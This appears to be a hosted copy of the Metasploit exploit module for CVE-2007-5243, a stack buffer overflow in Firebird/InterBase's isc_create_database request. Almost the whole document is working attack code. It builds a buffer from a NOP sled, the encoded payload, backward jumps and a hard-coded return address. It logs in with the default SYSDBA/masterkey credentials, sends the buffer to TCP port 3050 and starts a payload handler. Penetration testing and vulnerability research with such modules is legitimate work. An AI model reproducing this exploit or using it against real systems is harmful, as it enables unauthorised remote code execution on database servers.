Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/misc/fb_isc_create_database.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::BruteTargets1011def initialize(info = {})12super(update_info(info,13'Name' => 'Firebird Relational Database isc_create_database() Buffer Overflow',14'Description' => %q{15This module exploits a stack buffer overflow in Borland InterBase16by sending a specially crafted create request.17},18'Author' =>19[20'Ramon de C Valle',21'Adriano Lima <adriano[at]risesecurity.org>',22],23'Arch' => ARCH_X86,24'Platform' => 'win',25'References' =>26[27[ 'CVE', '2007-5243' ],28[ 'OSVDB', '38606' ],29[ 'BID', '25917' ],30[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],31],32'Privileged' => true,33'License' => MSF_LICENSE,34'Payload' =>35{36'Space' => 512,37'BadChars' => "\x00\x2f\x3a\x40\x5c",38'StackAdjustment' => -3500,39},40'Targets' =>41[42[ 'Brute Force', { } ],43# '\Device\HarddiskVolume1\WINDOWS\system32\unicode.nls'44[45'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',46{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b }47],48# Debug49[50'Debug',51{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }52],53],54'DefaultTarget' => 1,55'DisclosureDate' => '2007-10-03'56))5758register_options(59[60Opt::RPORT(3050)61])62end6364# Create database parameter block65def dpb_create66isc_dpb_user_name = 2867isc_dpb_password = 296869isc_dpb_version1 = 17071user = 'SYSDBA'72pass = 'masterkey'7374dpb = ''7576dpb << [isc_dpb_version1].pack('c')7778dpb << [isc_dpb_user_name].pack('c')79dpb << [user.length].pack('c')80dpb << user8182dpb << [isc_dpb_password].pack('c')83dpb << [pass.length].pack('c')84dpb << pass8586dpb87end8889# Calculate buffer padding90def buf_padding(length = '')91remainder = length.remainder(4)92padding = 09394if remainder > 095padding = (4 - remainder)96end9798padding99end100101def exploit_target(target)102103target['Length'].each do |length|104105connect106107# Create database108op_create = 20109110# Extra padding to trigger the exception111extra_padding = 1024 * 16112113buf = ''114115# Operation/packet type116buf << [op_create].pack('N')117118# Id119buf << [0].pack('N')120121# Length122buf << [length + extra_padding].pack('N')123124# Nop block125buf << make_nops(length - payload.encoded.length - 13)126127# Payload128buf << payload.encoded129130# Jump back into the nop block131buf << "\xe9" + [-516].pack('V')132133# Jump back134buf << "\xeb" + [-7].pack('c')135136# Random alpha data137buf << rand_text_alpha(2)138139# Target140buf << [target.ret].pack('V')141142# Random alpha data143buf << rand_text_alpha(extra_padding)144145# Padding146buf << "\x00" * buf_padding(length + extra_padding)147148# Database parameter block149150# Create database parameter block151dpb = dpb_create152153# Database parameter block length154buf << [dpb.length].pack('N')155156# Database parameter block157buf << dpb158159# Padding160buf << "\x00" * buf_padding(dpb.length)161162sock.put(buf)163164select(nil,nil,nil,4)165166handler167168end169170end171end172173174